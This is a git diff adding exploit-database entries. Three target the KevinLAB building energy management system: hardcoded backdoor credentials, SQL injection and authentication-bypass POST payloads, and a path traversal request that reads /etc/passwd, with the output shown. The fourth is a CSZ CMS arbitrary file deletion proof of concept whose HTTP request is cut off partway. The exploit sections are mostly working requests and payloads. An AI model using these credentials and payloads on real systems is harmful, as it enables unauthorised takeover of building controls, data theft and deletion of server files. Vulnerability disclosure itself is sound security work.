diff --git a/exploits/hardware/remote/50145.txt b/exploits/hardware/remote/50145.txt new file mode 100644 index 000000000..fcf888523 --- /dev/null +++ b/exploits/hardware/remote/50145.txt @@ -0,0 +1,53 @@ +# Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The BEMS solution has an undocumented backdoor account and these sets of +credentials are never exposed to the end-user and cannot be changed through any +normal operation of the solution thru the RMI. Attacker could exploit this +vulnerability by logging in using the backdoor account with highest privileges +for administration and gain full system control. The backdoor user cannot be +seen in the users settings in the admin panel and it also uses an undocumented +privilege level (admin_pk=1) which allows full availability of the features that +the BEMS is offering remotely. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5654 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php + + +05.07.2021 + +-- + + +Backdoor accounts from the DB: +------------------------------ + +Username: kevinlab (permission=1) +Password: kevin003 + +Username: developer1 (permission=6) +Password: 1234 \ No newline at end of file diff --git a/exploits/hardware/webapps/50146.txt b/exploits/hardware/webapps/50146.txt new file mode 100644 index 000000000..aa5d76abe --- /dev/null +++ b/exploits/hardware/webapps/50146.txt @@ -0,0 +1,62 @@ +# Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The application suffers from an unauthenticated SQL Injection vulnerability. +Input passed through 'input_id' POST parameter in '/http/index.php' is not properly +sanitised before being returned to the user or used in SQL queries. This can be exploited +to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication +mechanism. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5655 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php + + +05.07.2021 + +-- + + +PoC POST data payload (extract): +-------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] + + +PoC POST data payload (authbypass): +----------------------------------- + +POST /http/index.php HTTP/1.1 +Host: 192.168.1.3 + +requester=login +request=login +params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] \ No newline at end of file diff --git a/exploits/hardware/webapps/50147.txt b/exploits/hardware/webapps/50147.txt new file mode 100644 index 000000000..43610198e --- /dev/null +++ b/exploits/hardware/webapps/50147.txt @@ -0,0 +1,57 @@ +# Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) +# Date: 05.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kevinlab.com + +Vendor: KevinLAB Inc. +Product web page: http://www.kevinlab.com +Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) + +Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy +management platform. KevinLAB's BEMS (Building Energy Management System) enables +efficient energy management in buildings. It improves the efficient of energy use +by collecting and analyzing various information of energy usage and facilities in +the building. It also manages energy usage, facility efficiency and indoor environment +control. + +Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. +Input passed through the 'page' GET parameter in index.php is not properly verified +before being used to include files. This can be exploited to disclose the contents +of arbitrary and sensitive files via directory traversal attacks. + +Tested on: Linux CentOS 7 + Apache 2.4.6 + Python 2.7.5 + PHP 5.4.16 + MariaDB 5.5.68 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5656 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php + + +05.07.2021 + +-- + + +GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 + +root:x:0:0:root:/root:/bin/bash +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/php/webapps/50148.txt b/exploits/php/webapps/50148.txt new file mode 100644 index 000000000..c3c580f01 --- /dev/null +++ b/exploits/php/webapps/50148.txt @@ -0,0 +1,356 @@ +# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion +# Date: 2021-07-20 +# Exploit Author: faisalfs10x (https://github.com/faisalfs10x) +# Vendor Homepage: https://www.cszcms.com +# Software Link: https://sourceforge.net/projects/cszcms/files/latest/download +# Version: 1.2.9 +# Tested on: Windows 10, XAMPP +# Reference: https://github.com/cskaza/cszcms/issues/32 + + +################ +# Description # +################ + +# CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. + + +########## +# PoC 1 # +########## + +Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave +Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php + +Steps to Reproduce: + +1. Login as admin +2. Goto Plugin Manager > Article > edit any article +3. Upload any image as "Main Picture" and "File Upload" and click save button +4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button +5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" + + +1) Assumed there are files conf_secret_file.php and config_backup.txt in web root + +PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root + +Request: +======== + +POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 +Host: localhost +Content-Length: 2048 +Cache-Control: max-age=0 +sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" +sec-ch-ua-mobile: ?0 +Upgrade-Insecure-Requests: 1 +Origin: http://localhost +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 +Connection: close + +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="title" + +article beta +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="keyword" + +testing file +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="short_desc" + +deletion +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="cat_id" + +2 +------WebKitFormBoundaryAMyATk1BfQaBOHvY +Content-Disposition: form-data; name="content" + +
test for file deletion
+